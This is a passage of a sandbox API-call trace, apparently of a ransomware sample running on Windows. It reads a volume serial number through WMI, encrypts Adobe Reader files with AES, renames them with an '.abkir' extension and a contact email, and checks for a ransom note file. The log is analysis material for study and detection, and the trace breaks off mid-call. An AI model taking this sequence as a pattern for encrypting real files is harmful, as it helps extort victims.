Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0207.304] WbemLocator:IUnknown:Release (This=0x6027440) returned 0x2 [0207.304] WbemLocator:IUnknown:Release (This=0x6027440) returned 0x1 [0207.304] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0207.304] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0207.304] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027440) returned 0x0 [0207.304] WbemLocator:IUnknown:AddRef (This=0x6027440) returned 0x3 [0207.304] WbemLocator:IUnknown:Release (This=0x6027440) returned 0x2 [0207.304] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0207.304] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0207.304] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.304] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027450) returned 0x0 [0207.304] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027450, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60335dc) returned 0x0 [0207.656] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b134) returned 0x0 [0207.656] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b134, pProxy=0x60335dc, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0207.656] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x1 [0207.656] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b154) returned 0x0 [0207.656] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b134) returned 0x0 [0207.657] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b134, pProxy=0x60335dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0207.657] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x2 [0207.657] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0207.657] CoTaskMemFree (pv=0xbd4858) [0207.657] WbemLocator:IUnknown:Release (This=0x6027450) returned 0x0 [0207.657] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b154) returned 0x0 [0207.657] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0207.657] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0207.658] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0207.658] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0207.658] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0207.658] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b0b4) returned 0x0 [0207.658] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b0b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.659] WbemLocator:IUnknown:Release (This=0xb5b0b4) returned 0x3 [0207.659] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0207.659] CoGetContextToken (in: pToken=0x8f6e078 | out: pToken=0x8f6e078) returned 0x0 [0207.659] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0207.659] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b13c) returned 0x0 [0207.659] WbemLocator:IRpcOptions:Query (in: This=0xb5b13c, pPrx=0xb5b154, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0207.659] WbemLocator:IUnknown:Release (This=0xb5b13c) returned 0x3 [0207.659] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0207.659] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0207.659] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0207.659] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60335dc) returned 0x0 [0207.659] WbemLocator:IUnknown:AddRef (This=0x60335dc) returned 0x4 [0207.659] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x3 [0207.659] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x2 [0207.659] SysStringLen (param_1=0x0) returned 0x0 [0207.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0207.659] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0207.659] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.659] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0207.659] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0207.659] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b154) returned 0x0 [0207.659] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x3 [0207.659] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0207.659] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0207.660] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.660] IWbemServices:GetObject (in: This=0x60335dc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0207.776] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0207.776] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0207.776] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.776] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x371f2b0*=0, plFlavor=0x371f2b4*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x371f2b0*=8, plFlavor=0x371f2b4*=0) returned 0x0 [0207.776] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.776] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.776] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x371f2b0*=8, plFlavor=0x371f2b4*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x371f2b0*=8, plFlavor=0x371f2b4*=0) returned 0x0 [0207.776] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.776] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.776] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", lpFilePart=0x0) returned 0x36 [0207.776] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0207.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0207.777] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x353bf060, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0207.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0207.777] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0207.778] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", lpFilePart=0x0) returned 0x36 [0207.778] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0207.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0207.778] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0207.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0207.778] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", lpFilePart=0x0) returned 0x36 [0207.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0207.778] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), fInfoLevelId=0x0, lpFileInformation=0x371f7ec | out: lpFileInformation=0x371f7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7)) returned 1 [0207.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0207.778] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", lpFilePart=0x0) returned 0x36 [0207.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0207.779] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0207.779] GetFileType (hFile=0x208) returned 0x1 [0207.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0207.779] GetFileType (hFile=0x208) returned 0x1 [0207.779] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x43b7 [0207.779] ReadFile (in: hFile=0x208, lpBuffer=0x37cd124, nNumberOfBytesToRead=0x43b7, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37cd124*, lpNumberOfBytesRead=0x8f6eedc*=0x43b7, lpOverlapped=0x0) returned 1 [0207.786] CloseHandle (hObject=0x208) returned 1 [0207.786] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe0580) returned 1 [0207.787] CryptGenRandom (in: hProv=0xbe0580, dwLen=0x10, pbBuffer=0x37d383c | out: pbBuffer=0x37d383c) returned 1 [0208.200] CryptImportKey (in: hProv=0xbe0580, pbData=0x367cdc0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f850) returned 1 [0208.200] CryptContextAddRef (hProv=0xbe0580, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.200] CryptContextAddRef (hProv=0xbe0580, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.200] CryptDuplicateKey (in: hKey=0xb7f850, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fc10) returned 1 [0208.200] CryptContextAddRef (hProv=0xbe0580, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.200] CryptSetKeyParam (hKey=0xb7fc10, dwParam=0x4, pbData=0x367cea0*=0x1, dwFlags=0x0) returned 1 [0208.200] CryptSetKeyParam (hKey=0xb7fc10, dwParam=0x1, pbData=0x367ce6c, dwFlags=0x0) returned 1 [0208.200] CryptEncrypt (in: hKey=0xb7fc10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3707110*, pdwDataLen=0x8f6eea8*=0x43c0, dwBufLen=0x43c0 | out: pbData=0x3707110*, pdwDataLen=0x8f6eea8*=0x43c0) returned 1 [0208.200] CryptEncrypt (in: hKey=0xb7fc10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x370b4f4*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x370b4f4*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0208.202] CryptDestroyKey (hKey=0xb7f850) returned 1 [0208.202] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0208.202] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0208.202] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", lpFilePart=0x0) returned 0x36 [0208.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0208.202] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0208.203] GetFileType (hFile=0x27c) returned 0x1 [0208.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0208.203] GetFileType (hFile=0x27c) returned 0x1 [0208.203] WriteFile (in: hFile=0x27c, lpBuffer=0x370bafc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x370bafc*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0208.204] CloseHandle (hObject=0x27c) returned 1 [0208.205] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0208.205] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0208.205] CoTaskMemFree (pv=0xbed438) [0208.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0208.205] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0208.205] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0208.205] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0208.205] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.206] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027210) returned 0x0 [0208.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0208.207] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027210, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6031350) returned 0x0 [0208.207] WbemDefPath:IUnknown:Release (This=0x6027210) returned 0x0 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6031350) returned 0x0 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0208.207] WbemDefPath:IUnknown:AddRef (This=0x6031350) returned 0x3 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbe2430) returned 0x0 [0208.207] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 